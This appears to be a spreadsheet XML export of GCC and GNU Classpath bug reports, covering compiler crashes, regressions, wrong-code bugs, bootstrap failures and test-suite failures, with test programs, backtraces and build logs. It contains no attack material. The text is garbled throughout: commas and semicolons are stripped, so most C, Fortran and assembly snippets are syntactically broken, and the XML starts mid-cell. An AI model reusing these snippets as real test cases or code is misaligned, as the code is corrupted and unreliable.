g++ -S -Os -fno-strict-aliasing -fvisibility=hidden -mtune=pentiumpro -fvisibility-inlines-hidden -g -fno-exceptions -fpic -o pentiumpro-salgdi.s salgdi.ii
g++ -c -fpic -o ../../../unxlngi6.pro/slo/salgdi.o pentiumpro-salgdi.s
and all is well and as 
b)
++ -S -Os -fno-strict-aliasing -fvisibility=hidden -mtune=pentium4 -fvisibility-inlines-hidden -g -fno-exceptions -fpic -o pentium4-salgdi.s salgdi.ii
g++ -c -fpic -o ../../../unxlngi6.pro/slo/salgdi.o pentium4-salgdi.s
all is not well. 
.s also attached in an attempt to be useful</t>
  </si>
  <si>
    <t>GCC-23817</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in check_loop_closed_ssa_use at tree-ssa-loop-manip.c:398</t>
  </si>
  <si>
    <t>// test case compile with -O3
int foo1 (void)
void foo2 (int)
static int foo9 (int k)
{
  return ((k == 0x00) || (k == 0x10) || (k == 0x14))
}
static int foo8 (int *p)
{
  return *p
}
void foo6 (int *p)
{
  int a b c d e = 0
  foo8 (p)
  b = 0
  do
    {
      b++
      a = foo1()
    }
  while (b &lt; 3 
 repeat:
  d = 3
  do
    {
      c = foo1 ()
      if (c)
        foo1 ()
      d--
    }
  while (c 
  if (c &amp;&amp; !e)
    {
      foo2 (c)
      return
    }
  if (!e)
    {
      e = 1
      goto repeat
    }
}
// compiler output:
sd.i: In function 'foo6':
sd.i:15: internal compiler error: in check_loop_closed_ssa_use at
tree-ssa-loop-manip.c:398</t>
  </si>
  <si>
    <t>GCC-26727</t>
  </si>
  <si>
    <t>[4.2 Regression] gcc.target/powerpc/doloop-1.c fails</t>
  </si>
  <si>
    <t>I was looking through my testsuite results and noticed this fails.
We deinitely don't get a do loop at all:
L7:
        addic. r0r0-1
        add r4r4r2
        addi r2r21
        bne- cr0L7
L5:
......
       blr
L6:
        add r5r5r2
        addi r2r21
        bdz L5
        add r5r5r2
        addi r2r21
        bdz L5
        b L6
Really this testcase could be optimized even further to just:
    if (count &gt; 10)
        pcb += count
    else  if (count &gt; 0)
       pca += count
But that is a different issue (and would cause this testcase to fail again because then the testcase is not testing what it should be testing).
Anyways what we get in final_cleanup is:
:
  if (count &gt; 10) goto  else goto 
:
  if (count &gt; 0) goto  else goto 
:
  i.39 = 1
:
  pcb = (char *) i.39 + pcb
  i.39 = i.39 + 1
  if (i.39 != count) goto  else goto 
:
  i = 0
:
  pca = (char *) i + pca
  i = i + 1
  if (i != count) goto  else goto 
Which obviously confuses the IV lookup on the rtl level.
Anyways here the testcase:
/* { dg-do compile { target powerpc*-*-* } } */
/* { dg-options -O2 } */
void foo (int count char* pca char* pcb) {
    int i
    if (count &gt; 10)
        for (i = 0 i &lt; count ++i)
            pcb += i
    else
        for (i = 0 i &lt; count ++i)
            pca += i
    *pca = *pcb
}
/* { dg-final { scan-assembler bdnz } } */</t>
  </si>
  <si>
    <t>GCC-14724</t>
  </si>
  <si>
    <t>[3.3 Regression] Destructor not called on backwards goto past initialization</t>
  </si>
  <si>
    <t>When the following program is compiled with g++ 3.3.2 and executed it
will invoke the constructor of the object v 10 times in a row with
no intervening calls to the destructor as evidenced by it printing
ctor 10 times but dtor only once.
According to ISO/IEC 14882:1998(E) section 6.6 the destructor of v
should be invoked each time the goto statement is executed:
a transfer [...] back past an initialized variable with automatic
storage duration involves the destruction of variables with automatic
storage duration that are in scope at the point transferred from but
not at the point transferred to.
The program works correctly when compiled with gcc 2.95.
#include 
template 
struct C {
        C() { std::cout &lt;&lt; ctor\n }
        ~C() { std::cout &lt;&lt; dtor\n }
}
int main(int char **) {
        int i = 0
 again:
        C v
        if (++i &lt; 10)
                goto again
}</t>
  </si>
  <si>
    <t>gson</t>
  </si>
  <si>
    <t>GCC-6890</t>
  </si>
  <si>
    <t>xmmintrin.h _MM_TRANSPOSE4_PS is broken</t>
  </si>
  <si>
    <t xml:space="preserve">	the code in _MM_TRANSPOSE4_PS is incorrect.
Release:
3.1 (Debian) (Debian testing/unstable)
Environment:
System: Linux stag 2.4.17-686sk #1 Fri Feb 15 18:08:06 GMT 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=$\(prefix\)/share/man --infodir=$\(prefix\)/share/info --with-gxx-include-dir=$\(prefix\)/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
	n/a</t>
  </si>
  <si>
    <t>GCC-52682</t>
  </si>
  <si>
    <t>[patch] gcc-4.7.0/gcc/c-family/c-lex.c doesn't compile with old C compilers</t>
  </si>
  <si>
    <t>Created attachment 26964
patch to fix the problem
c-lex.c has declarations after an assignment and doesn't compile with gcc-2.96 distributed with Red Hat Linux 7.1.
William
williambader@hotmail.com</t>
  </si>
  <si>
    <t>GCC-35941</t>
  </si>
  <si>
    <t>gcc-4.4-20080411 bootstrap failure</t>
  </si>
  <si>
    <t>bootstrap fails with the trailing error messages below
[...]
gcc -g -DIN_GCC -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -fno-common -DHAVE_CONFIG_H -DGENERATOR_FILE  -o build/gencheck \
    build/gencheck.o ../build-i686-pc-linux-gnu/libiberty/libiberty.a
build/gencheck &gt; tmp-check.h
/bin/sh ../../gcc-4.4-20080411/gcc/../move-if-change tmp-check.h tree-check.h
echo timestamp &gt; s-check
build/genpreds -c ../../gcc-4.4-20080411/gcc/config/i386/i386.md &gt; tmp-constrs.h/bin/sh ../../gcc-4.4-20080411/gcc/../move-if-change tmp-constrs.h tm-constrs.h
echo timestamp &gt; s-constrs-h
gcc -c -g -DIN_GCC -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -fno-common -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I../../gcc-4.4-20080411/gcc -I../../gcc-4.4-20080411/gcc/build -I../../gcc-4.4-20080411/gcc/../include -I../../gcc-4.4-20080411/gcc/../libcpp/include -I/home/voax/linux/tools/mpfr-2.3.1/include -I../../gcc-4.4-20080411/gcc/../libdecnumber -I../../gcc-4.4-20080411/gcc/../libdecnumber/bid -I../libdecnumber  -o build/gencondmd.o build/gencondmd.c
gcc  -g -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE  -o build/gencondmd \
    build/gencondmd.o ../build-i686-pc-linux-gnu/libiberty/libiberty.a
build/gencondmd &gt; tmp-cond.md
/bin/sh ../../gcc-4.4-20080411/gcc/../move-if-change tmp-cond.md insn-conditions.md
echo timestamp &gt; s-condmd
build/genflags ../../gcc-4.4-20080411/gcc/config/i386/i386.md \
  insn-conditions.md &gt; tmp-flags.h
/bin/sh ../../gcc-4.4-20080411/gcc/../move-if-change tmp-flags.h insn-flags.h
echo timestamp &gt; s-flags
make[3]: *** No rule to make target `|' needed by `c-lang.o'.  Stop.
make[3]: Leaving directory `/home/voax/linux/build-4.4.0/gcc'
make[2]: *** [all-stage1-gcc] Error 2
make[2]: Leaving directory `/home/voax/linux/build-4.4.0'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/voax/linux/build-4.4.0'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-32879</t>
  </si>
  <si>
    <t>Document algorithm used for random generator</t>
  </si>
  <si>
    <t>gfortran has:
 irand() - g77
 rand() - g77
 random_number() - Fortran 90
The algorithm used is different.
Expected:
- State something about the used algorithm
- Point rand() users to random_number() as this algorithm is seemingly better.
  (or make at least clear(er) that the algorithms are different)
Cf. http://gcc.gnu.org/ml/fortran/2007-07/msg00454.html
&gt; There are two random number generators in gfortran one is a simple modulo 
&gt; generator that is there for compatibility with g77 this is what you get when 
&gt; you call RAND().
&gt;
&gt; The other is the RNG that implements the Fortran 90 RANDOM_NUMBER intrinsic. 
&gt; [...] George Marsaglia's KISS (Keep It Simple Stupid)</t>
  </si>
  <si>
    <t>GCC-59258</t>
  </si>
  <si>
    <t>ubsan: ICE(segfault): stack-buffer-overflow with -fsanitize=undefined</t>
  </si>
  <si>
    <t>I run into this with a bigger code and GCC 4.9 r205287 on x86-64-gnu-linux. Using an about one-week old GCC it compiled successfully - but now it segfaults.
I have now created a -fsanitize=address GCC build which allowed me to reduce the code (before I couldn't go smaller than about 64k).
In any case GCC now fails for:
  cc1plus -fsanitize=undefined
for this 5-line program:
class Parent { }
class RefNameDict : public Parent {
  explicit RefNameDict (bool uniqueNames)
}
RefNameDict::RefNameDict (bool uniqueNames) { }
Address sanitizer prints:
==8820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffcc257f58 at pc 0x1768edf bp 0x7fffcc257e60 sp 0x7fffcc257e58
WRITE of size 8 at 0x7fffcc257f58 thread T0
    #0 ubsan_create_data(char const* unsigned int ubsan_mismatch_data const* ...) + 2493 in section .text
    #1 ubsan_expand_null_ifn(gimple_stmt_iterator_d) + 2283 in section .text
    #2 execute_sanopt() + 838 in section .text
    #3 (anonymous namespace)::pass_sanopt::execute() + 8 in section .text
...
Address 0x7fffcc257f58 is located in stack of thread T0 at offset 184 in frame
    #0 ubsan_create_data(char const* unsigned int ubsan_mismatch_data const* ...) + 15 in section .text
  This frame has 5 object(s):
    [32 40) 'saved_args'
    [96 104) 'v'
    [160 184) 'fields' &lt;== Memory access at offset 184 overflows this variable
    [224 248) 'args'
    [288 320) 'tmp_name'</t>
  </si>
  <si>
    <t>GCC-9639</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] Namespace std in constructor argument lists on illegal code causes an ICE</t>
  </si>
  <si>
    <t>g++ reports as follows:
bug.C:1: internal compiler error: in cp_parser_function_definition at cp/parser.c:10927
Release:
gcc version 3.4 20030209 (experimental)
Environment:
i686-pc-linux-gnu
--enable-version-specific-runtime-libs --disable-nls --enable-languages=cc++
How-To-Repeat:
The file bug.C:
struct s { s(std::b o) { } }
Compile it with no arguments
g++ bug.C</t>
  </si>
  <si>
    <t>nneul</t>
  </si>
  <si>
    <t>CLASSPATH-23037</t>
  </si>
  <si>
    <t>Swing: JFileChooser directory-up function broken</t>
  </si>
  <si>
    <t xml:space="preserve">Classpath CVS 20050713
The current implementation of the JFileChooser 'directory up'
(change to parent directory) is mostly broken on my system. 
The behaviour seems random which makes it hard to create 
a useful testcase.
Just bring up a JFileChooser (e.g. in your home directory)
and then try clicking the 'directory up' button multiple
times and select some directories from the file list
from time to time.
Usually clicking the 'directory up' button works the first
time. After the second click things often go wrong the
usual sympton is that only a few (actually two) entries
of the selected directory are displayed sometimes completely
wrong entries (from other directories and even different
directories) are displayed.
</t>
  </si>
  <si>
    <t>GCC-82228</t>
  </si>
  <si>
    <t>[8 Regression] 416.gamess in SPEC CPU 2006 failed to build</t>
  </si>
  <si>
    <t>On x86-64 r252791 gave
$ gfortran -c -o solib.fppized.o -O3 -funroll-loops -ffast-math -ffixed-form solib.fppized.f
internal compiler error: in vect_get_num_copies at tree-vectorizer.h:1093
statpt.fppized.f:1080:72:
0x75b2ce vect_get_num_copies
	../../src-trunk/gcc/tree-vectorizer.h:1092
0x75b2ce vectorizable_live_operation(gimple* gimple_stmt_iterator* _slp_tree* int gimple**)
	../../src-trunk/gcc/tree-vect-loop.c:7035
0x757c33 vect_analyze_stmt(gimple* bool* _slp_tree* _slp_instance*)
	../../src-trunk/gcc/tree-vect-stmts.c:8690
0x76ae81 vect_analyze_loop_operations
	../../src-trunk/gcc/tree-vect-loop.c:1756
0x76ae81 vect_analyze_loop_2
	../../src-trunk/gcc/tree-vect-loop.c:2042
0x76ae81 vect_analyze_loop(loop* _loop_vec_info*)
	../../src-trunk/gcc/tree-vect-loop.c:2355
0xf5e00e vectorize_loops()
	../../src-trunk/gcc/tree-vectorizer.c:685
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
specmake[3]: *** [solib.fppized.o] Error 1
r252079 is OK.</t>
  </si>
  <si>
    <t>GCC-81662</t>
  </si>
  <si>
    <t>fpatchable-function-entry requires nop which nvptx does not have</t>
  </si>
  <si>
    <t>nop is a standard name that needs to be defined ( https://gcc.gnu.org/onlinedocs/gccint/Standard-Names.html#index-nop-instruction-pattern ):
...
â€˜nopâ€™
    No-op instruction. This instruction pattern name should always be defined to output a no-op in assembler code. (const_int 0) will do as an RTL pattern. 
...
And nops are used for fpatchable-function-entry:
....
void
default_print_patchable_function_entry (FILE *file
                                        unsigned HOST_WIDE_INT patch_area_size
                                        bool record_p)
{
  const char *nop_templ = 0
  int code_num
  rtx_insn *my_nop = make_insn_raw (gen_nop ())
...
The nvptx target defines nop but the output string is empty because nvptx does not support nops:
...
(define_insn nop
  [(const_int 0)]
  )
...
So for nvptx we run into these failures:
...
FAIL: c-c++-common/patchable_function_entry-decl.c  -Wc++-compat   scan-assembler-times nop 2
FAIL: c-c++-common/patchable_function_entry-default.c  -Wc++-compat   scan-assembler-times nop 3
FAIL: c-c++-common/patchable_function_entry-definition.c  -Wc++-compat   scan-assembler-times nop 1
...
We should:
- skips these test-cases for nvptx
- error out for nvptx is the flag is used
- add an nvptx test-case that checks that.</t>
  </si>
  <si>
    <t>GCC-7227</t>
  </si>
  <si>
    <t>[3.2/3.3 regression]: bogus code generation with attribute mode TI</t>
  </si>
  <si>
    <t>This testcase yields an uninitialized variable warning when compiled with the trunk.  The current 3.1.x branch doesn't complain thus it is a regression.  I've written the testcase in a form suitable for installation as gcc.dg/uninit-C.c:
/* Spurious uninitialized variable warning inspired by libgcc2.c.  */
/* { dg-do compile } */
/* { dg-options -O -Wuninitialized } */
typedef int TItype __attribute__ ((mode (TI)))
TItype
__subvdi3 (TItype a TItype b)
{
  TItype w
  w = a - b
  return w
}
Release:
gcc version 3.3 20021022 (experimental)
Environment:
sparc-sun-solaris2.7 &amp; mips-sgi-irix6.2 (but probably all)</t>
  </si>
  <si>
    <t>GCC-13702</t>
  </si>
  <si>
    <t>When preprocessing Fortran files (.F .F90 and .F95) cpp should emit line numbers.</t>
  </si>
  <si>
    <t>Currently when preprocessing Fortran files gfortran calls cpp with the -P
option which prevents it to emit line number information.
The reason for this is that at the moment the Fortran front end cannot process
these directives.
However for debugging purposes it's paramount that this infomation is emitted
by cpp and interpreted by the Fortran front end without it line numbers in
debugging records will refer to the lines in the preprocessed source not the
original.</t>
  </si>
  <si>
    <t>toon</t>
  </si>
  <si>
    <t>GCC-15602</t>
  </si>
  <si>
    <t>Illegal program not detected 7.2(4)</t>
  </si>
  <si>
    <t>The following program compiles binds links and prints hello world
when run.  It shouldn't link because the body for pak5 isn't allowed
unless the spec for pak5 has a (correctly spelled) pragma
elaborate_body since there is nothing else in the spec of pak5 that
would require a body.
RM 7.2(4):
A library package_declaration or library generic_package_declaration
shall not have a body unless it requires a body pragma Elaborate_body
can be used to require a library_unit declaration to have a body (see
10.2.1) if it would not otherwise require one.
Here is the program:
package pak1 is
end pak1
generic
package pak1.pak2 is
   pragma elaborate_body
end pak1.pak2
package body pak1.pak2 is
end pak1.pak2
with pak1.pak2
generic
   with package new_pak2 is new pak1.pak2()
package pak5 is
   pragma eaoaeoy         -- ERROR: can't abbreviate elaborate_body
end pak5
with text_io
package body pak5 is
begin
   text_io.put_line(hello world)
end pak5
with pak5
with pak1.pak2
procedure test20 is
   package new_pak2 is new pak1.pak2
   package new_pak5 is new pak5(new_pak2)
begin
   null
end
The trace below shows that GNAT compiles pak5.adb when it shouldn't.
$ gnatchop -w p gnatmake test20
splitting p into:
   pak1.ads
   pak1-pak2.ads
   pak1-pak2.adb
   pak5.ads
   pak5.adb
   test20.adb
gcc -c test20.adb
pak5.ads:7:04: warning: unrecognized pragma eaoaeoy
gcc -c pak1.ads
gcc -c pak1-pak2.adb
gcc -c pak5.adb
pak5.ads:7:04: warning: unrecognized pragma eaoaeoy
gnatbind -x test20.ali
gnatlink test20.ali
$ ./test20
hello world</t>
  </si>
  <si>
    <t>GCC-36449</t>
  </si>
  <si>
    <t>Incorrect code generated for access to a large struct</t>
  </si>
  <si>
    <t>Please refer to the attached example.
When the struct 'ZIP' in this example is enlarged by one word
G++ silently generates incorrect code.</t>
  </si>
  <si>
    <t>GCC-6712</t>
  </si>
  <si>
    <t>__default_alloc_template erroneously calls realloc</t>
  </si>
  <si>
    <t>In bits/stl_alloc.h (CVS rev 1.19)
__default_alloc_template::reallocate
calls realloc. realloc is of course part of the C malloc/free/realloc system whereas the rest of the class uses the mem_interface system.
On systems where operator new doesn't directly call malloc havoc ensues quickly...
On systems where realloc is not implemented at all the library simply cannot be used.
Release:
CVS build 17 May 2002
Environment:
all</t>
  </si>
  <si>
    <t>GCC-37430</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] C974013 gives exception</t>
  </si>
  <si>
    <t>Laurent indicated this is spurious on other targets but it is 100% regular on rtems so I thought I would give a backtrace. 
It is calling pthread_kill(SIGABORT).  This is the backtrace.
.. C974013 ACATS 2.5 88-01-01 00:00:00
---- C974013 Asynchronous Select: Trigger is delay_until which completes
                before abortable part.
Breakpoint 6 pthread_kill (thread=184614916 sig=6)
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/posix/src/pthreadkill.c:37
37        if ( !sig )
(gdb) bt
#0  pthread_kill (thread=184614916 sig=6)
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/posix/src/pthreadkill.c:37
#1  0x00005600 in system.task_primitives.operations.abort_task (
    t=) at s-taprop.adb:1077
#2  0x00009950 in system.tasking.initialization.locked_abort_to_level (
    self_id=0x90f10 t=0x93f50 l=) at s-tasini.adb:505
#3  0x0000ed88 in system.tasking.async_delays.timer_server (
    =) at s-taasde.adb:382
#4  0x0000e0a4 in system.tasking.stages.task_wrapper (self_id=0x90f10)
    at s-tassta.adb:1151
#5  0x00052b38 in _Thread_Handler ()
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/score/src/threadhandler.c:150
#6  0x00052a48 in _Thread_Evaluate_mode ()
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/score/src/threadevaluatemode.c:53
This is the backtrace in rtems/powerpc from the abort (signo=6) when it is processed.
(gdb) r
Starting program: /home/joel/work-gnat/svn/gcc/gcc/testsuite/ada/acats/work-psim/tests/c9/c974013/c974013 
.. C974013 ACATS 2.5 88-01-01 00:00:00
---- C974013 Asynchronous Select: Trigger is delay_until which completes
                before abortable part.
Breakpoint 4 C_exception_handler (excPtr=0x715f20) at /home/joel/work-gnat/svn//rtems/c/src/lib/libcpu/powerpc/new-exceptions/bspsupport/vectors_init.c:119
119       nest++
(gdb) bt
#0  C_exception_handler (excPtr=0x715f20) at /home/joel/work-gnat/svn//rtems/c/src/lib/libcpu/powerpc/new-exceptions/bspsupport/vectors_init.c:119
#1  0x00038f20 in wrap_call_global_handler_std ()
    at /home/joel/work-gnat/svn//rtems/c/src/lib/libcpu/powerpc/new-exceptions/bspsupport/ppc_exc_asm_macros.h:596
#2  0xa5a5a5a5 in ?? ()
#3  0x00015880 in  () at a-exextr.adb:140
#4  0x00015508 in ada.exceptions.exception_propagation.propagate_exception (e= from_signal_handler=)
    at a-exexpr.adb:116
#5  0x0001641c in  (e=0x3ad1331d) at a-except.adb:829
#6  0x000164b4 in  (e=0x7ecf4 message={P_ARRAY = 0x80000 P_BOUNDS = 0x429f0005}) at a-except.adb:868
#7  0x00006740 in system.task_primitives.operations.abort_handler (sig=) at s-taprop.adb:222
#8  0x00052420 in _POSIX_signals_Check_signal (api=0x6efef0 signo=6 is_global=)
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/posix/src/psignalchecksignal.c:85
#9  0x0004f214 in _POSIX_signals_Post_switch_extension (the_thread=)
    at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/posix/src/psignal.c:146
#10 0x00048d38 in _API_extensions_Run_postswitch () at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/score/src/apiext.c:103
#11 0x0004ae74 in _Thread_Dispatch () at /home/joel/work-gnat/svn//rtems/c/src/../../cpukit/score/src/threaddispatch.c:175
#12 0x00039768 in ppc_exc_wrapup (f=)
    at /home/joel/work-gnat/svn//rtems/c/src/lib/libcpu/powerpc/new-exceptions/bspsupport/ppc_exc_hdl.c:97
#13 0x00038e28 in recover_check_twiddle_std_std ()
    at /home/joel/work-gnat/svn//rtems/c/src/lib/libcpu/powerpc/new-exceptions/bspsupport/ppc_exc_asm_macros.h:596
Backtrace stopped: frame did not save the PC</t>
  </si>
  <si>
    <t>GCC-37836</t>
  </si>
  <si>
    <t>ICE in gfc_trans_auto_array_allocation</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/57938d5454a90397/589afd86ab2aab9b
The following program gives an ICE:
test.f90:14: internal compiler error: in gfc_trans_auto_array_allocation at fortran/trans-array.c:4115
The bug has been found by James Van Buskirk.
! Automatic data object
      function fun4a(x)
         real xfun4a
!         real y(nint(exp(3.0)))
         real y(minval([nint(exp(3.0))]))
         fun4a = y(1)
         y = x
      end function fun4a
      function fun4b(x)
         real xfun4b
!         real y(nint(exp(3.0)))
         real y(minval([nint(exp(3.0))]))
         save
         fun4b = y(1)
         y = x
      end function fun4b</t>
  </si>
  <si>
    <t>GCC-24066</t>
  </si>
  <si>
    <t>treelang</t>
  </si>
  <si>
    <t>almost all treelang testsuite fails with -maltivec as an option</t>
  </si>
  <si>
    <t>The warning which is produced:
/Users/pinskia/src/ns/gcc/gcc/testsuite/treelang/compile/extrafunc.tree:0: warning: 'const' attribute 
directive ignored</t>
  </si>
  <si>
    <t>GCC-57791</t>
  </si>
  <si>
    <t>Wasted work in gfc_check_pointer_assign()</t>
  </si>
  <si>
    <t>Created attachment 30430
Suggested patch
The problem appears in revision 200588 in version 4.9. I have attached a one-line patch that fixes it.
In method gfc_check_pointer_assign() in expr.c the loop on line 3763 should break immediately after warn is set to true. All the iterations after warn set to true do not perform any useful work at best they just set warn again to true.</t>
  </si>
  <si>
    <t>pchang9</t>
  </si>
  <si>
    <t>GCC-30215</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr23818.c (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.3/objdir/gcc/xgcc -B/home/dave/gcc-4.3/objdi
r/gcc/ /home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c   -O2 -fno-tree-dom
inator-opts -fno-show-column  -lm   -o ./pr23818.exe    (timeout = 300)
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c: In function 'foo':
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c:20: internal compiler erro
r: in output_address at final.c:3182
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c: In function 'foo':
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c:20: internal compiler erro
r: in output_address at final.c:3182
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/pr23818.c (internal compiler error)
FAIL: gcc.dg/pr23818.c (test for excess errors)
Starting program: /home/dave/gcc-4.3/objdir/gcc/cc1 `cat xx.sh`
GNU C version 4.3.0 20061213 (experimental) (hppa-linux)
        compiled by GNU C version 4.3.0 20061213 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
options passed:  -iprefix
 /home/dave/gcc-4.3/objdir/gcc/../lib/gcc/hppa-linux/4.3.0/ -isystem
 /home/dave/gcc-4.3/objdir/gcc/include
 /home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c -auxbase-strip
 ./pr23818.s -O2 -fno-tree-dominator-opts -fno-show-column
options enabled:  -falign-loops -fargument-alias -fbranch-count-reg
 -fcaller-saves -fcommon -fcprop-registers -fcrossjumping
 -fcse-follow-jumps -fdefer-pop -fdelayed-branch
 -fdelete-null-pointer-checks -fearly-inlining
 -feliminate-unused-debug-types -femit-class-debug-always
 -fexpensive-optimizations -fforward-propagate -ffunction-cse -fgcse
 -fgcse-lm -fguess-branch-probability -fident -fif-conversion
 -fif-conversion2 -finline-functions-called-once -fipa-pure-const
 -fipa-reference -fipa-type-escape -fivopts -fkeep-static-consts
 -fleading-underscore -fmath-errno -fmerge-constants -fmove-loop-invariants
 -fomit-frame-pointer -foptimize-register-move -foptimize-sibling-calls
 -fpeephole -fpeephole2 -freg-struct-return -fregmove -freorder-blocks
 -freorder-functions -frerun-cse-after-loop -fsched-interblock -fsched-spec
 -fsched-stalled-insns-dep -fschedule-insns -fschedule-insns2
 -fsplit-ivs-in-unroller -fstrict-aliasing -fthread-jumps
 -ftoplevel-reorder -ftrapping-math -ftree-ccp -ftree-ch -ftree-copy-prop
 -ftree-copyrename -ftree-dce -ftree-dse -ftree-fre -ftree-loop-im
 -ftree-loop-ivcanon -ftree-loop-optimize -ftree-pre -ftree-salias
 -ftree-sink -ftree-sra -ftree-store-ccp -ftree-store-copy-prop -ftree-ter
 -ftree-vect-loop-version -ftree-vrp -funit-at-a-time -fvar-tracking
 -fzero-initialized-in-bss -mbig-switch -mgas -mglibc -mno-space-regs
Compiler executable checksum: f865cc56161569c8f9e4f97e8e9517f1
 foo main
Analyzing compilation unit
Performing interprocedural optimizations
Assembling functions:
 foo
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c: In function 'foo':
/home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/pr23818.c:20: internal compiler error: in output_address at final.c:3182
Breakpoint 1 output_address (x=0x400aadd0) at ../../gcc/gcc/final.c:3182
3182      PRINT_OPERAND_ADDRESS (asm_out_file x)
(gdb) p debug_rtx (x)
(plus:SI (const_int 0 [0x0])
    (reg/v/f:SI 26 %r26 [orig:144 p ] [144]))
(gdb) p debug_rtx (insn)
(insn 75 78 87 (set (reg:SI 28 %r28 [151])
        (mem:SI (plus:SI (const_int 0 [0x0])
                (reg/v/f:SI 26 %r26 [orig:144 p ] [144])) [5 S4 A32])) 37 {*pa.md:2482} (nil)
    (expr_list:REG_EQUIV (mem:SI (plus:SI (const_int 0 [0x0])
                (reg/v/f:SI 26 %r26 [orig:144 p ] [144])) [5 S4 A32])
        (nil)))
Seems to have been created by expand:
 MEM[base: q index: 0B] = MEM[base: p index: 0B] + 10
(insn 75 73 76 (set (reg:SI 151)
        (mem:SI (plus:SI (const_int 0 [0x0])
                (reg/v/f:SI 144 [ p ])) [5 S4 A32])) -1 (nil)
    (nil))
The PLUS isn't in canonical form.
#define PRINT_OPERAND_ADDRESS(FILE ADDR)  \
{ rtx addr = ADDR                                                      \
  switch (GET_CODE (addr))                                              \
    {                                                                   \
    case REG:                                                           \
      fprintf (FILE 0(%s) reg_names [REGNO (addr)])                \
      break                                                            \
    case PLUS:                                                          \
      gcc_assert (GET_CODE (XEXP (addr 1)) == CONST_INT)              \
      fprintf (FILE %d(%s) (int)INTVAL (XEXP (addr 1))            \
               reg_names [REGNO (XEXP (addr 0))])                     \
      break                                                            \</t>
  </si>
  <si>
    <t>GCC-1230</t>
  </si>
  <si>
    <t>gcj fail on code to implement an inner interface.</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: I have a patch.
</t>
  </si>
  <si>
    <t>mdejong</t>
  </si>
  <si>
    <t>GCC-58532</t>
  </si>
  <si>
    <t>[4.9 Regression] bootstrap failure with BOOT_CFLAGS=-g -O3</t>
  </si>
  <si>
    <t>I just tried to bootstrap gcc 4.9 trunk dated
20130925 on an AMD Phenom with BOOT_CFLAGS=-g -O3.
It failed but on checking the difference between
-O2 and -O3 I got the following setting
of BOOT_CFLAGS to bootstrap ok.
-g -O2 -ftree-partial-pre -fipa-cp-clone -fvect-cost-model -ftree-slp-vectorize -ftree-loop-vectorize -fgcse-after-reload -funswitch-loops -fpredictive-commoning
It looks to me like flag -ftree-loop-distribute-patterns breaks bootstrap.</t>
  </si>
  <si>
    <t>GCC-77359</t>
  </si>
  <si>
    <t>[7 Regression] AIX bootstrap failure due to alignment of stack pointer + STACK_DYNAMIC_OFFSET</t>
  </si>
  <si>
    <t>The patch causes bootstrap failure on AIX.  Stage 1 GCC is miscompiled and gencfn-macros fails with numerous errors.</t>
  </si>
  <si>
    <t>GCC-52805</t>
  </si>
  <si>
    <t>[4.8 Regression] 243 new GCC HEAD@185977 regressions (libjava failures)</t>
  </si>
  <si>
    <t>Revision 185977:
Author:	steven
Date:	Thu Mar 29 21:00:23 2012 UTC (38 hours 29 minutes ago)
Changed paths:	2
Log Message:	
	PR java/52730
	* class.c (emit_register_classes_in_jcr_section): New function.
	(emit_Jv_RegisterClass_calls): New function split out from ...
	(emit_register_classes): ... here. Reorganize.  Do not call
	output_constant.
caused massive failures in the libjava test suite (see http://gcc.gnu.org/ml/gcc-regression/2012-03/msg00282.html and the recent posts at http://gcc.gnu.org/ml/gcc-regression/2012-03/ ).</t>
  </si>
  <si>
    <t>GCC-70708</t>
  </si>
  <si>
    <t>Suboptimal code generated when using _mm_set_sd (X64)</t>
  </si>
  <si>
    <t>The ABI already uses XMM registers for floating point operations. Compare the following two snippets:
  double MyMinV1(double a double b) {
    return a 
  }
  double MyMinV2(double a double b) {
    __m128d x = _mm_set_sd(a)
    __m128d y = _mm_set_sd(b)
    return _mm_cvtsd_f64(_mm_min_sd(x y))
  }
And the code generated:
